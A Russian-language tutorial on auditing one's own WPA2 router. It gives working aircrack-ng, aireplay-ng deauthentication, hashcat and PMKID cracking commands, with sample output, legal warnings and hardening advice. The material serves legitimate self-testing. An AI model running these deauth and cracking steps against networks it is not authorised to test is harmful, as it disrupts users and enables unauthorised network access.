WPA2 считался неприступным почти 20 лет. Спойлер: он и сейчас неприступен — если у тебя длинный пароль. Проверим это на СВОЁМ роутере, чтобы понять, насколько ты реально защищён.
Aircrack-ng — легендарный набор инструментов с открытым исходным кодом для аудита Wi-Fi-сетей, существующий с 2006 года. Он умеет мониторить трафик, перехватывать хендшейки и взламывать пароли WEP и WPA/WPA2-PSK. Это не «взлом соседского Wi-Fi» — это стандартный инструмент аудита безопасности собственной инфраструктуры.
⚠️ Обязательно: тестируй только свою собственную сеть или сеть, на которую есть письменное разрешение владельца. Несанкционированный доступ к чужой сети подпадает под статью 272 УК РФ — подробнее в статье про Scope и разрешение.
🧬 Как работает WPA2: что именно мы атакуем
WPA2 защищает Wi-Fi через 4-Way Handshake — обмен пакетами при подключении клиента к точке доступа:
|
1 2 3 4 5 6 7 |
1. AP → Клиент: ANonce (случайное число от роутера) 2. Клиент → AP: SNonce + MIC (случайное число + код проверки) 3. AP → Клиент: подтверждение установки ключа 4. Клиент → AP: ACK Из этих 4 пакетов вычисляется PTK (Pairwise Transient Key) — уникальный сессионный ключ шифрования для этого клиента. |
Ключевая слабость для атакующего: сам пароль Wi-Fi (PSK — Pre-Shared Key) никогда не передаётся по воздуху в открытом виде. Но математически PMK (Pairwise Master Key), из которого выводится PTK, зависит напрямую от пароля. Значит, если перехватить handshake — можно офлайн подбирать пароль, пока не найдётся тот, что даёт совпадающий MIC.
💡 Взлом WPA2 — это не взлом шифрования AES. Это подбор исходного пароля методом brute-force/dictionary против перехваченного handshake.
🛠️ Что понадобится
|
1 2 3 4 5 6 7 8 9 |
✅ Kali Linux (VM или на живом железе — предпочтительнее) ✅ Wi-Fi адаптер с поддержкой Monitor Mode и Packet Injection (встроенный адаптер ноутбука часто НЕ поддерживает это в виртуальной машине — нужен внешний USB-адаптер, например Alfa AWUS036ACH) ✅ aircrack-ng suite (обычно предустановлен в Kali) ✅ Словарь паролей (rockyou.txt или свой) ✅ Hashcat (опционально, для GPU-ускорения) ✅ Твой собственный роутер с WPA2 🏠 |
|
1 2 3 4 5 |
# Проверить/установить Aircrack-ng: sudo apt update && sudo apt install aircrack-ng -y # Проверить поддержку адаптера: airmon-ng |
🚀 Шаг 1: Режим мониторинга
Обычный Wi-Fi адаптер видит только трафик, адресованный ему. Monitor Mode переключает карту в режим прослушки всего эфира на канале:
|
1 2 3 4 5 6 7 8 |
# Посмотреть интерфейсы: iwconfig # Включить режим мониторинга (интерфейс обычно wlan0): sudo airmon-ng start wlan0 # Проверить, что интерфейс переименован в wlan0mon: iwconfig |
🔥 Если появляется ошибка о процессах, мешающих режиму мониторинга — airmon-ng сам предложит их убить:
|
1 |
sudo airmon-ng check kill |
🔍 Шаг 2: Разведка — находим свою сеть
|
1 2 |
# Смотрим все сети в радиусе действия: sudo airodump-ng wlan0mon |
Вывод покажет таблицу:
|
1 2 |
BSSID PWR Beacons #Data CH MB ENC ESSID AA:BB:CC:DD:EE:FF -42 156 23 6 130 WPA2 MyHomeWiFi |
Записываем BSSID (MAC-адрес роутера) и CH (канал) — это твоя цель. Останавливаем сканирование Ctrl+C.
🎯 Шаг 3: Целевой перехват handshake
Теперь фокусируемся именно на своей сети и ждём подключения клиента:
|
1 2 3 4 5 |
sudo airodump-ng \ -c 6 \ --bssid AA:BB:CC:DD:EE:FF \ -w capture \ wlan0mon |
|
1 2 3 |
-c 6 # канал твоей сети --bssid AA:BB:CC:DD:EE:FF # MAC твоего роутера -w capture # сохранить захват в файл capture-01.cap |
Терминал остаётся открытым и ждёт handshake. В правом верхнем углу должна появиться надпись WPA handshake: AA:BB:CC:DD:EE:FF — это подтверждение успешного перехвата.
⚡ Шаг 4: Форсируем handshake через деаутентификацию
Ждать естественного подключения клиента можно долго. Быстрее — принудительно отключить уже подключённое устройство (например, свой телефон), заставив его переподключиться:
|
1 2 |
# В НОВОМ терминале (первый должен продолжать захват!): sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon |
|
1 2 |
--deauth 10 # отправить 10 деаутентификационных пакетов -a # BSSID целевой точки доступа |
Устройство отключится от Wi-Fi и автоматически переподключится — в этот момент первый терминал перехватит полный 4-way handshake.
⚠️ Деаутентификация — активное вмешательство в работу сети. На чужой сети без разрешения это уже само по себе противоправное действие, отдельное от взлома пароля.
💥 Шаг 5: Взлом пароля через Aircrack-ng
Как только handshake захвачен — переходим к офлайн-подбору:
|
1 2 3 4 |
# Базовая словарная атака: aircrack-ng -w /usr/share/wordlists/rockyou.txt \ -b AA:BB:CC:DD:EE:FF \ capture-01.cap |
|
1 2 |
-w # путь к словарю паролей -b # BSSID цели (фильтрует нужную сеть из файла захвата) |
При успехе видим:
|
1 2 3 4 5 6 7 |
[00:03:12] 148921/14344391 keys tested (776.42 k/s) KEY FOUND! [ MyStrongPass123 ] Master Key : CD 69 0D A8 ... Transient Key : 4F 09 D1 B6 ... EAPOL HMAC : 5A 8E 33 7C ... |
🚀 Ускоряем взлом через Hashcat (GPU)
Aircrack-ng работает только на CPU и медленный на длинных словарях. Hashcat с GPU-ускорением проходит те же словари в разы быстрее:
|
1 2 3 4 5 6 7 8 |
# Установить необходимые инструменты: sudo apt install hashcat hcxtools -y # Конвертировать .cap в формат hashcat 22000: hcxpcapngtool -o hashes.hc22000 capture-01.cap # Запустить взлом на GPU: hashcat -m 22000 -a 0 hashes.hc22000 /usr/share/wordlists/rockyou.txt |
|
1 2 |
-m 22000 # формат WPA-PBKDF2-PMKID+EAPOL -a 0 # режим словарной атаки |
⚡ PMKID-атака — взлом без деаутентификации
Более современная техника, не требующая перехвата полного handshake и подключённого клиента:
|
1 2 3 4 5 6 7 8 |
# PMKID передаётся точкой доступа в первом же пакете # при попытке подключения — деаутентификация не нужна sudo hcxdumptool -o pmkid.pcapng -i wlan0mon --enable_status=1 # Конвертация и взлом идентичны обычному handshake: hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt |
💡 PMKID-атака работает не на всех роутерах — некоторые производители (особенно новые модели) отключили эту функцию именно из-за этой уязвимости.
📊 Сколько времени займёт взлом твоего пароля
Реальность зависит исключительно от длины и сложности пароля:
| Тип пароля | Пример | Время взлома (GPU) |
|---|---|---|
| Словарное слово | sunflower |
Секунды (есть в rockyou.txt) |
| Слово + цифры | wifi2024 |
Минуты |
| 8 символов, смешанный регистр+цифры | Xk7pL9mQ |
Часы – дни (брутфорс) |
| 12+ случайных символов | T9$mK2#nP7@qL4 |
Годы — практически невозможно |
| Passphrase 20+ символов | синий-слон-читает-книгу-в-парке |
Не взламывается разумными средствами |
🛡️ Как защитить СВОЙ роутер после этого теста
Раз ты только что взломал (или не взломал) собственную сеть — вот выводы для реальной защиты
|
1 2 3 4 5 6 7 8 9 |
✅ Пароль минимум 15-20 символов, желательно passphrase (несколько случайных слов, не из популярных словарей) ✅ Отключить WPS (Wi-Fi Protected Setup) — отдельная и часто более простая уязвимость роутеров ✅ Перейти на WPA3, если роутер поддерживает — защищён от offline-словарных атак архитектурно ✅ Отключить PMKID, если в настройках роутера есть такая опция ✅ Регулярно проверять список подключённых устройств ✅ Изменить SSID и пароль по умолчанию сразу после покупки роутера |
🧠 WPA3: почему старые атаки больше не работают
Если твой роутер поддерживает WPA3 — попробуй провести ту же атаку и убедишься, что она не сработает:
|
1 2 3 4 5 6 7 8 |
WPA3 использует SAE (Simultaneous Authentication of Equals) вместо 4-way handshake: ├── Offline dictionary attack становится невозможной — │ каждая попытка подбора требует ИНТЕРАКЦИИ с точкой доступа ├── Forward secrecy — компрометация пароля НЕ раскрывает │ ранее записанный трафик └── Защита от PMKID-атаки — протокол архитектурно другой |
📋 Чеклист для домашнего аудита
|
1 2 3 4 5 6 7 8 9 |
✅ Kali Linux + USB Wi-Fi адаптер с поддержкой monitor mode ✅ airmon-ng start wlan0 — режим мониторинга включён ✅ airodump-ng wlan0mon — найден свой BSSID и канал ✅ Целевой захват с флагом -w capture запущен ✅ aireplay-ng --deauth для форсирования handshake (на СВОЁМ устройстве) ✅ Handshake подтверждён (WPA handshake: XX:XX...) ✅ aircrack-ng или hashcat запущен со словарём ✅ Результат: пароль взломан за секунды → меняй пароль СЕГОДНЯ ✅ Результат: пароль не взломан за разумное время → пароль хороший |
💣 Итог: Aircrack-ng не ломает WPA2 как криптографию — он ломает твою лень при выборе пароля. Домашний аудит собственного роутера за 20 минут покажет то, что реально важно: если твой пароль взломался за секунды через rockyou.txt — у тебя проблема, и решается она одной сменой пароля на длинную passphrase. Это редкий случай, когда «взломать себя» — лучшая инвестиция в безопасность за вечер.



